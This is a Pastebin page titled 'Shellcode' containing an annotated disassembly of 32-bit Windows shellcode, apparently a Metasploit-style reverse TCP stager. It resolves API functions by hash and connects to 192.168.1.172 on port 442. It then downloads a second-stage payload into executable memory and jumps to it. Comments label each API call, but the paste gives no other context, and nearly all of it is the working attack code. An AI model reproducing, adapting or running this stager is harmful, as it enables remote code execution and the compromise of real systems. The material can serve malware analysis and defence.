API tools faq
paste
Advertisement
James_inthe_box

Shellcode

James_inthe_box
May 19th, 2018
485
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.46 KB | None | 0 0
raw download clone embed print report
  1. 0x00000000 fc cld
  2. 0x00000001 e882000000 call 0x00000088
  3. 0x00000006 60 pushad
  4. 0x00000007 89e5 mov ebp,esp
  5. 0x00000009 31c0 xor eax,eax
  6. 0x0000000b 648b5030 fs: mov edx,dword [eax + 48]
  7. 0x0000000f 8b520c mov edx,dword [edx + 12]
  8. 0x00000012 8b5214 mov edx,dword [edx + 20]
  9. 0x00000015 8b7228 mov esi,dword [edx + 40]
  10. 0x00000018 0fb74a26 movzx ecx,word [edx + 38]
  11. 0x0000001c 31ff xor edi,edi
  12. 0x0000001e ac lodsb
  13. 0x0000001f 3c61 cmp al,97
  14. 0x00000021 7c02 jl 0x00000025
  15. 0x00000023 2c20 sub al,32
  16. 0x00000025 c1cf0d ror edi,13
  17. 0x00000028 01c7 add edi,eax
  18. 0x0000002a e2f2 loop 0x0000001e
  19. 0x0000002c 52 push edx
  20. 0x0000002d 57 push edi
  21. 0x0000002e 8b5210 mov edx,dword [edx + 16]
  22. 0x00000031 8b4a3c mov ecx,dword [edx + 60]
  23. 0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120]
  24. 0x00000038 e348 jecxz 0x00000082
  25. 0x0000003a 01d1 add ecx,edx
  26. 0x0000003c 51 push ecx
  27. 0x0000003d 8b5920 mov ebx,dword [ecx + 32]
  28. 0x00000040 01d3 add ebx,edx
  29. 0x00000042 8b4918 mov ecx,dword [ecx + 24]
  30. 0x00000045 e33a jecxz 0x00000081
  31. 0x00000047 49 dec ecx
  32. 0x00000048 8b348b mov esi,dword [ebx + ecx * 4]
  33. 0x0000004b 01d6 add esi,edx
  34. 0x0000004d 31ff xor edi,edi
  35. 0x0000004f ac lodsb
  36. 0x00000050 c1cf0d ror edi,13
  37. 0x00000053 01c7 add edi,eax
  38. 0x00000055 38e0 cmp al,ah
  39. 0x00000057 75f6 jnz 0x0000004f
  40. 0x00000059 037df8 add edi,dword [ebp - 8]
  41. 0x0000005c 3b7d24 cmp edi,dword [ebp + 36]
  42. 0x0000005f 75e4 jnz 0x00000045
  43. 0x00000061 58 pop eax
  44. 0x00000062 8b5824 mov ebx,dword [eax + 36]
  45. 0x00000065 01d3 add ebx,edx
  46. 0x00000067 668b0c4b mov cx,word [ebx + ecx * 2]
  47. 0x0000006b 8b581c mov ebx,dword [eax + 28]
  48. 0x0000006e 01d3 add ebx,edx
  49. 0x00000070 8b048b mov eax,dword [ebx + ecx * 4]
  50. 0x00000073 01d0 add eax,edx
  51. 0x00000075 89442424 mov dword [esp + 36],eax
  52. 0x00000079 5b pop ebx
  53. 0x0000007a 5b pop ebx
  54. 0x0000007b 61 popad
  55. 0x0000007c 59 pop ecx
  56. 0x0000007d 5a pop edx
  57. 0x0000007e 51 push ecx
  58. 0x0000007f ffe0 jmp eax
  59. 0x00000081 5f pop edi
  60. 0x00000082 5f pop edi
  61. 0x00000083 5a pop edx
  62. 0x00000084 8b12 mov edx,dword [edx]
  63. 0x00000086 eb8d jmp 0x00000015
  64. 0x00000088 5d pop ebp
  65. 0x00000089 6833320000 push 0x00003233--> '23'
  66. 0x0000008e 687773325f push 0x5f327377--> '_2sw'
  67. 0x00000093 54 push esp
  68. 0x00000094 684c772607 push 0x0726774c--> '&wL'
  69. 0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA
  70. 0x0000009b b890010000 mov eax,400
  71. 0x000000a0 29c4 sub esp,eax
  72. 0x000000a2 54 push esp
  73. 0x000000a3 50 push eax
  74. 0x000000a4 6829806b00 push 0x006b8029--> 'k)'
  75. 0x000000a9 ffd5 call ebp --> ws2_32.dll!WSAStartup
  76. 0x000000ab 6a0a push 10
  77. 0x000000ad 68c0a801ac push 0xac01a8c0
  78. 0x000000b2 68020001ba push 0xba010002--> IP 192.168.1.172:442
  79. 0x000000b7 89e6 mov esi,esp
  80. 0x000000b9 50 push eax
  81. 0x000000ba 50 push eax
  82. 0x000000bb 50 push eax
  83. 0x000000bc 50 push eax
  84. 0x000000bd 40 inc eax
  85. 0x000000be 50 push eax
  86. 0x000000bf 40 inc eax
  87. 0x000000c0 50 push eax
  88. 0x000000c1 68ea0fdfe0 push 0xe0df0fea
  89. 0x000000c6 ffd5 call ebp --> ws2_32.dll!WSASocketA
  90. 0x000000c8 97 xchg eax,edi
  91. 0x000000c9 6a10 push 16
  92. 0x000000cb 56 push esi
  93. 0x000000cc 57 push edi
  94. 0x000000cd 6899a57461 push 0x6174a599--> 'at'
  95. 0x000000d2 ffd5 call ebp --> ws2_32.dll!connect
  96. 0x000000d4 85c0 test eax,eax
  97. 0x000000d6 740c jz 0x000000e4
  98. 0x000000d8 ff4e08 dec dword [esi + 8]
  99. 0x000000db 75ec jnz 0x000000c9
  100. 0x000000dd 68f0b5a256 push 0x56a2b5f0
  101. 0x000000e2 ffd5 call ebp --> kernel32.dll!ExitProcess
  102. 0x000000e4 6a00 push 0
  103. 0x000000e6 6a04 push 4
  104. 0x000000e8 56 push esi
  105. 0x000000e9 57 push edi
  106. 0x000000ea 6802d9c85f push 0x5fc8d902
  107. 0x000000ef ffd5 call ebp --> ws2_32.dll!recv
  108. 0x000000f1 8b36 mov esi,dword [esi]
  109. 0x000000f3 6a40 push 64
  110. 0x000000f5 6800100000 push 4096
  111. 0x000000fa 56 push esi
  112. 0x000000fb 6a00 push 0
  113. 0x000000fd 6858a453e5 push 0xe553a458--> 'SX'
  114. 0x00000102 ffd5 call ebp --> kernel32.dll!VirtualAlloc
  115. 0x00000104 93 xchg eax,ebx
  116. 0x00000105 53 push ebx
  117. 0x00000106 6a00 push 0
  118. 0x00000108 56 push esi
  119. 0x00000109 53 push ebx
  120. 0x0000010a 57 push edi
  121. 0x0000010b 6802d9c85f push 0x5fc8d902
  122. 0x00000110 ffd5 call ebp --> ws2_32.dll!recv
  123. 0x00000112 01c3 add ebx,eax
  124. 0x00000114 29c6 sub esi,eax
  125. 0x00000116 75ee jnz 0x00000106
  126. 0x00000118 c3 ret
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!